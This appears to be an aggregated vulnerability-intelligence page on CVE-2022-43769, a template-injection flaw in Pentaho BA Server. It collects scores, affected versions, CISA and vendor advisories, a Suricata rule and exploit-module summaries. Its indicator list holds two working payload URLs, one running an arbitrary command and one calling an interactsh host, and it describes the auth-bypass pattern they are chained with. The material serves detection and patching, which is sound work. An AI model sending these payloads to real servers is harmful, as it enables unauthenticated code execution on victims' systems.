CVE-2022-43769
published 2023-04-03CVE-2022-43769: Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values…
PriorityP183high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-03-24
Exploited in the wild
EPSS
97.67%
99.9th percentile
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hitachi | vantara_pentaho_business_analytics_server | — | — |
| hitachi | vantara_pentaho_business_analytics_server | >= 8.3.0.0 < 9.3.0.2 | 9.3.0.2 |
| hitachi_vantara | pentaho_business_analytics_server | >= 1.0 < 9.3.0.2 | 9.3.0.2 |
| hitachi_vantara | pentaho_business_analytics_server | >= 9.4.0.0 < 9.4.0.1 | 9.4.0.1 |
Detection & IOCsextracted from sources · hover to see the quote
url/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a↗
url/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{cmd}')}}&mgrDn=a&pwd=a↗
- →Detect SSTI exploitation attempts by monitoring GET requests to /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js with a 'url' parameter containing Spring/Thymeleaf template expressions (e.g., #{T(java.lang...)}) ↗
- →The auth bypass (CVE-2022-43939) is triggered by URLs ending in '/' followed by 'require', optionally '-js' or '-cfg', any character, then 'js' — monitor for non-canonical URL patterns matching this regex against protected Pentaho endpoints ↗
- →In HTTP responses from the vulnerable endpoint, a body of '{}' with a 200 status and 'application/json' content-type header containing 'Path=/pentaho' cookie indicates a successful auth bypass probe ↗
- →For the SSTI RCE probe, a response body of 'false' with 'application/json' content-type header confirms successful template injection execution ↗
- →Active exploitation observed from 15 malicious IPs between December 6, 2024 and February 28, 2025; top source countries are Singapore, Hong Kong, and United States — use GreyNoise tags for CVE-2022-43769 to identify and block scanning IPs ↗
- ·The exploit (CVE-2022-43769 + CVE-2022-43939 chained) only works on the Enterprise Edition of Pentaho BA Server; community edition behavior is untested ↗
- ·Unauthenticated RCE requires chaining both CVE-2022-43939 (auth bypass) and CVE-2022-43769 (SSTI); CVE-2022-43769 alone is rated PR:H (high privilege required) per CVSS ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
cisa7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wc6x-gmp9-8p34: Hitachi Vantara Pentaho Business Analytics Server prior to versions 9
ghsa_unreviewed·2023-04-03
CVE-2022-43769 [HIGH] CWE-74 GHSA-wc6x-gmp9-8p34: Hitachi Vantara Pentaho Business Analytics Server prior to versions 9
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.
VulnCheck
Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
vulncheck·2022·CVSS 8.8
CVE-2022-43769 [HIGH] CWE-74 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
Hitachi Vantara Pentaho BA Server contains a special element injection vulnerability that allows an attacker to inject Spring templates into properties files, allowing for arbitrary command execution.
Affected: Hitachi Vantara Pentaho Business Analytics (BA) Server
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.greynoise.io/blog/greynoise-observes-exploitation-three-newly-added-kev-vulnerabilities; https://isc.sans.edu/diary/rss/32518; https://www.loginsoft.co
CISA
Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
cisa·2025-03-03·CVSS 7.2
CVE-2022-43769 [HIGH] CWE-74 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
Vulnerability: Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
Affected: Hitachi Vantara Pentaho Business Analytics (BA) Server
Hitachi Vantara Pentaho BA Server contains a special element injection vulnerability that allows an attacker to inject Spring templates into properties files, allowing for arbitrary command execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769 ;
Suricata
ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)
suricata·2025-03-05·CVSS 8.8
CVE-2022-43939 [HIGH] ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)
ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pentaho/api/ldap/config/ldapTreeNodeChildren/"; fast_pattern; startswith; content:"require"; within:50; content:"js|3f|url|3d|"; within:50; content:"|28|java.lang.Runtime|29 2e|getRuntime|28 29 2e|exec|28|"; within:200; reference:cve,2022-43939; reference:cve,2022-437969; reference:url,attackerkb.com/topics/JGGe0nRNNv/cve-2022-43939; reference:url,attackerkb.co
Exploit-DB
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb·2023-04-08·CVSS 8.8
CVE-2022-43939 [HIGH] Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0w
Nuclei
Hitachi Pentaho Business Analytics Server - Bypass Authorization
nuclei·CVSS 7.2
CVE-2022-43939 [HIGH] Hitachi Pentaho Business Analytics Server - Bypass Authorization
Hitachi Pentaho Business Analytics Server - Bypass Authorization
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.
Template:
id: CVE-2022-43939
info:
name: Hitachi Pentaho Business Analytics Server - Bypass Authorization
author: daffainfo
severity: high
description: |
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.
impact: |
Unauthenticated attackers can bypass authorization restrictions using non-canonical URL paths to access protected administrative endpoints in Hitachi Pentaho Business Analytics Server, potentially
Nuclei
Hitachi Pentaho Business Analytics Server - Remote Code Execution
nuclei·CVSS 7.2
CVE-2022-43769 [HIGH] Hitachi Pentaho Business Analytics Server - Remote Code Execution
Hitachi Pentaho Business Analytics Server - Remote Code Execution
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
Template:
id: CVE-2022-43769
info:
name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
author: dwbzn
severity: high
description: |
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible
Metasploit
Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
metasploit·CVSS 7.2
CVE-2022-43939 [HIGH] Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is vulnerable to an authentication bypass (CVE-2022-43939) and a Server Side Template Injection (SSTI) vulnerability (CVE-2022-43769) that can be chained together to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server. The first vulnerability (CVE-2022-43939) is an authentication bypass which stems from a regex that allows any URL that ends in "/", followed by "require", optionally "-js" or "-cfg", any character, and then the string "js" followed optionally by "?" and then any characters of the attacker's choice. The second (CVE-2022-43769) is a server side template i
Checkpoint
10th March – Threat Intelligence Report
blogs_checkpoint·2025-03-10
CVE-2025-22224 10th March – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 10th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th March, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
The City of Mission, Texas, has declared a local state of emergency following a severe cybersecurity incident that threatens to expose protected personal information, health records, and other critical data managed by city departments. The emergency declaration was issued by Mayor Norie Gonzalez Garza on March 4, 2025, after
Greynoiseio
GreyNoise Observes Exploitation of Three Newly Added KEV Vulnerabilities
blogs_greynoiseio·2025-03-04·CVSS 8.8
[HIGH] GreyNoise Observes Exploitation of Three Newly Added KEV Vulnerabilities
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.htmlhttps://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.htmlhttps://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-43769
2023-04-03
Published
2025-03-03
Added to CISA KEV
Exploited in the wild